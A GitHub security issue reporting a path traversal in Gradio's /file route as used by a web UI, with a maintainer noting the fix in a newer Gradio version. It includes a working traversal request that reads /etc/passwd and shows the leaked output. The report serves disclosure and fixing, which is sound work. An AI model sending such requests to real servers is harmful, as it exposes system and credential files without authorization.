Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[Security]: Path traversal in /file routes caused by gradio #12822

Closed
1 task done
b1ank1108 opened this issue Aug 28, 2023 · 2 comments
Closed
1 task done

[Security]: Path traversal in /file routes caused by gradio #12822

b1ank1108 opened this issue Aug 28, 2023 · 2 comments
Labels
bug-report Report of a bug, yet to be confirmed gradio Items related specifically to Gradio (user interface library). May or may not be upstream issues.

Comments

@b1ank1108
Copy link

Is there an existing issue for this?

  • I have searched the existing issues and checked the recent builds/commits

What happened?

path traversal happened in gradio==3.32.0

gradio-app/gradio#4370

Steps to reproduce the problem

GET /file=/tmp/gradio/../../etc/passwd HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36

HTTP/1.1 200 OK
Date: Mon, 28 Aug 2023 00:44:10 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 975
Connection: close
accept-ranges: bytes
last-modified: Mon, 31 Jul 2023 11:23:49 GMT
etag: eadf5080653b3e15eaaeb15bb31c2d0f
x-process-time: 0.004

root:x:0:0:root:/root:/bin/bash
……

What should have happened?

HTTP/1.1 403 Forbidden
date: Mon, 28 Aug 2023 01:05:43 GMT
server: uvicorn
content-length: 60
content-type: application/json
Connection: close

{"detail":"File not allowed: /tmp/gradio/../../etc/passwd."}

Version or Commit where the problem happens

version: v1.5.1

What Python version are you running on ?

None

What platforms do you use to access the UI ?

No response

What device are you running WebUI on?

No response

Cross attention optimization

Automatic

What browsers do you use to access the UI ?

No response

Command Line Arguments

no

List of extensions

no

Console logs

no

Additional information

No response
@b1ank1108 b1ank1108 added the bug-report Report of a bug, yet to be confirmed label Aug 28, 2023
@catboxanon
Copy link
Collaborator

Latest version of the webui bumps the Gradio version to 3.41.2 -- so I think this is fixed?

@catboxanon catboxanon added the gradio Items related specifically to Gradio (user interface library). May or may not be upstream issues. label Aug 28, 2023
@b1ank1108
Copy link
Author

Sorry, I only looked at the master branch. It was fixed on dev branch.

@aa956 aa956 mentioned this issue Mar 2, 2024
Open
6 tasks
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug-report Report of a bug, yet to be confirmed gradio Items related specifically to Gradio (user interface library). May or may not be upstream issues.
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@b1ank1108 @catboxanon